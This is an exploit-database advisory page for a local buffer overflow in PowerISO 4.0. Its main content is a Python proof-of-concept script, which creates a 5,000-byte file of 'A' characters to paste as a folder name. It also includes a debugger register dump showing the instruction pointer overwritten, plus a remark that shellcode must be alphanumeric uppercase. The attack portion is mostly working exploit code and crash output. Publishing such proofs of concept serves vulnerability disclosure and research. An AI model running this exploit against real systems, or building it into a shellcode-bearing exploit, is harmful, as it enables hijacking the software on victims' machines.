PowerISO version 4.0 local buffer overflow

2009.09.15
Credit: Dr_IDE
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/env python #################################################################################### # # Poweriso 4.0 Local Buffer Overflow PoC # Found By: Dr_IDE # Tested On: XPSP3 # Usage: Create New ISO, Add a New Folder, Paste to Rename Folder, Click Save # Notes: This must have been fixed somewhere between 4.0 and 4.7 # #################################################################################### ''' EAX 00ADDDC0 ECX 00000000 EDX 00004000 EBX 00000000 ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~0" EBP 00000000 ESI 0211FA20 EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EIP 41414141 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFD5000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty +UNORM 3C0A 0012EBE8 00000000 ST1 empty -UNORM F674 00000000 0000000C ST2 empty 3.3165366670546675450e-4932 ST3 empty 0.0000000000019151440e-4933 ST4 empty 3.3165367202851109490e-4932 ST5 empty +UNORM 0001 0012F674 00000000 ST6 empty +UNORM 000C 000B0418 7E418734 ST7 empty -UNORM ABCD 7E43E577 0012F674 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 ''' # Shellcode must be Alpha Upper buff = ("\x41" * 5000) f1 = open("poweriso.txt","w") f1.write(buff) f1.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top